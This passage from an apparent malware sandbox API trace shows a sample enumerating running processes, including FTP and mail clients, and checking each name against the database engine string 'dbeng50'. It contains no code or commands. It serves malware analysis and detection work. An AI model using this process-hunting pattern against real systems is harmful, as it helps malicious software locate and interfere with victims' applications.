cchWideChar=-1, lpMultiByteStr=0x356af10, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0095.995] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0095.995] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="dbeng50") returned 0x0 [0095.995] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0095.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.996] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35743e8 [0095.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x35743e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0095.996] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0095.996] StrStrIA (lpFirst="powell_jane.exe", lpSrch="dbeng50") returned 0x0 [0095.996] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0095.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.997] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35759c0 [0095.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x35759c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0095.997] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0095.997] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="dbeng50") returned 0x0 [0095.997] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0095.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.998] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3574358 [0095.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3574358, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0095.998] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0095.998] StrStrIA (lpFirst="gainedshape.exe", lpSrch="dbeng50") returned 0x0 [0095.998] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0095.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.999] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575aa0 [0095.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x3575aa0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0095.999] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0095.999] StrStrIA (lpFirst="opens-versions.exe", lpSrch="dbeng50") returned 0x0 [0095.999] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0096.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0096.000] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b190 [0096.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356b190, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0096.000] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0096.000] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="dbeng50") returned 0x0 [0096.001] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0096.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.001] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3574370 [0096.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3574370, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0096.001] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0096.002] StrStrIA (lpFirst="3dftp.exe", lpSrch="dbeng50") returned 0x0 [0096.002] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0096.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.003] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575b80 [0096.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3575b80, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0096.003] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0096.003] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="dbeng50") returned 0x0 [0096.003] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0096.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.004] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35742e0 [0096.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x35742e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0096.004] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0096.004] StrStrIA (lpFirst="alftp.exe", lpSrch="dbeng50") returned 0x0 [0096.004] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0096.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.005] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35742f8 [0096.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x35742f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0096.005] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0096.005] StrStrIA (lpFirst="barca.exe", lpSrch="dbeng50") returned 0x0 [0096.005] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0096.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.006] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35743d0 [0096.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x35743d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0096.006] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0096.006] StrStrIA (lpFirst="bitkinex.exe", lpSrch="dbeng50") returned 0x0 [0096.006] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0096.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.007] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35742c8 [0096.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x35742c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0096.007] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0096.007] StrStrIA (lpFirst="coreftp.exe", lpSrch="dbeng50") returned 0x0 [0096.007] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0096.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0096.008] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574e00 [0096.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3574e00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0096.008] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0096.008] StrStrIA (lpFirst="far.exe", lpSrch="dbeng50") returned 0x0 [0096.008] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0096.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.009] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3574388 [0096.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3574388, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0096.009] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0096.009] StrStrIA (lpFirst="filezilla.exe", lpSrch="dbeng50") returned 0x0 [0096.009] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0096.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.010] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3574400 [0096.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3574400, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0096.010] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0096.011] StrStrIA (lpFirst="flashfxp.exe", lpSrch="dbeng50") returned 0x0 [0096.011] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0096.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.012] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35743a0 [0096.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x35743a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0096.012] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0096.012] StrStrIA (lpFirst="fling.exe", lpSrch="dbeng50") returned 0x0 [0096.012] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0096.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.013] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575bc0 [0096.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3575bc0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0096.013] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0096.013] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="dbeng50") returned 0x0 [0096.013] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0096.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.014] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575ac0 [0096.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3575ac0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0096.014] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0096.014] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="dbeng50") returned 0x0 [0096.014] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0096.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0096.016] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574d30 [0096.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3574d30, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0096.016] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0096.016] StrStrIA (lpFirst="icq.exe", lpSrch="dbeng50") returned 0x0 [0096.016] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0096.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.017] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35743b8 [0096.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x35743b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0096.017] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0096.017] StrStrIA (lpFirst="leechftp.exe", lpSrch="dbeng50") returned 0x0 [0096.017] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0096.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.018] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3574418 [0096.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3574418, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0096.024] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0096.024] StrStrIA (lpFirst="ncftp.exe", lpSrch="dbeng50") returned 0x0 [0096.024] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0096.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.026] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3574280 [0096.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3574280, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0096.026] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0096.026] StrStrIA (lpFirst="notepad.exe", lpSrch="dbeng50") returned 0x0 [0096.026] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0096.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.027] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3574298 [0096.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3574298, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0096.027] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0096.027] StrStrIA (lpFirst="operamail.exe", lpSrch="dbeng50") returned 0x0 [0096.027] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0096.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 